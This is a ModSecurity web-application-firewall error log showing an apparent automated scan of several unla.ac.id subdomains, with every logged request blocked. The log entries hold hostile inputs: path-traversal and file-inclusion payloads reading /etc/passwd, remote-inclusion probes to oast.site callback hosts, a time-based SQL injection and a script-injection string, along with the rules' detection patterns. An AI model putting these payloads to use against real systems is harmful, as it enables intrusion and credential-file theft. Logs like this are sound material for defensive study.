[Tue Aug 29 11:40:58.482755 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAaZ9lEAAAAo"]
[Tue Aug 29 11:40:59.354747 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gwxau4rra1pwgy.oast.site found within TX:1: cjmnbitjmimt14dgn26gwxau4rra1pwgy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcYU68AAAAp"]
[Tue Aug 29 11:40:59.358557 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3599h6qc9qees.oast.site found within TX:1: cjmnbitjmimt14dgn26g3599h6qc9qees.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcoNNoAAAAF"]
[Tue Aug 29 11:40:59.359635 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO1228Co-f0AAActbFYAAAAH"]
[Tue Aug 29 11:40:59.375408 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdwoce8nj4m43h.oast.site found within TX:1: cjmnbitjmimt14dgn26gdwoce8nj4m43h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAYf-LYAAAAD"]
[Tue Aug 29 11:40:59.375450 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkijx7szuuaxhm.oast.site found within TX:1: cjmnbitjmimt14dgn26gkijx7szuuaxhm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcbSBYAAAAv"]
[Tue Aug 29 11:40:59.376965 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsnw36zmq799pw.oast.site found within TX:1: cjmnbitjmimt14dgn26gsnw36zmq799pw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcoNNsAAAAF"]
[Tue Aug 29 11:40:59.397163 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO1228Co-f0AAAcbSBcAAAAv"]
[Tue Aug 29 11:40:59.415655 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcvBcgAAAAJ"]
[Tue Aug 29 11:40:59.431336 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO1228Co-f0AAAcqJGoAAAAG"]
[Tue Aug 29 11:40:59.435546 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcYU7MAAAAp"]
[Tue Aug 29 11:40:59.436827 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcvBckAAAAJ"]
[Tue Aug 29 11:40:59.437583 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcoNN4AAAAF"]
[Tue Aug 29 11:41:00.361412 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAaZ9lYAAAAo"]
[Tue Aug 29 11:41:00.366495 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCYAAAAL"]
[Tue Aug 29 11:41:00.372069 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggpzkkd66kpspr.oast.site found within TX:1: cjmnbitjmimt14dgn26ggpzkkd66kpspr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO123MCo-f0AAActbFgAAAAH"]
[Tue Aug 29 11:41:00.380122 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAYf-LoAAAAD"]
[Tue Aug 29 11:41:00.380781 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcoNOAAAAAF"]
[Tue Aug 29 11:41:00.385742 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO123MCo-f0AAAcqJGwAAAAG"]
[Tue Aug 29 11:41:00.399621 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO123MCo-f0AAAcoNOEAAAAF"]
[Tue Aug 29 11:41:00.408914 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcbSBwAAAAv"]
[Tue Aug 29 11:41:00.409570 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCgAAAAL"]
[Tue Aug 29 11:41:00.412526 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAActbFoAAAAH"]
[Tue Aug 29 11:41:00.414677 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcqJG0AAAAG"]
[Tue Aug 29 11:41:00.419267 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYMWTkAAAAR"]
[Tue Aug 29 11:41:00.419378 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYf-LwAAAAD"]
[Tue Aug 29 11:41:00.419614 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcsLC0AAAAE"]
[Tue Aug 29 11:41:00.430832 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCkAAAAL"]
[Tue Aug 29 11:41:00.437942 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcqJG4AAAAG"]
[Tue Aug 29 11:41:00.440207 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcoNOMAAAAF"]
[Tue Aug 29 11:41:00.443487 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYf-L0AAAAD"]
[Tue Aug 29 11:41:01.392089 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcvBc8AAAAJ"]
[Tue Aug 29 11:41:01.393397 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAYMWTsAAAAR"]
[Tue Aug 29 11:41:01.400477 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcYU7kAAAAp"]
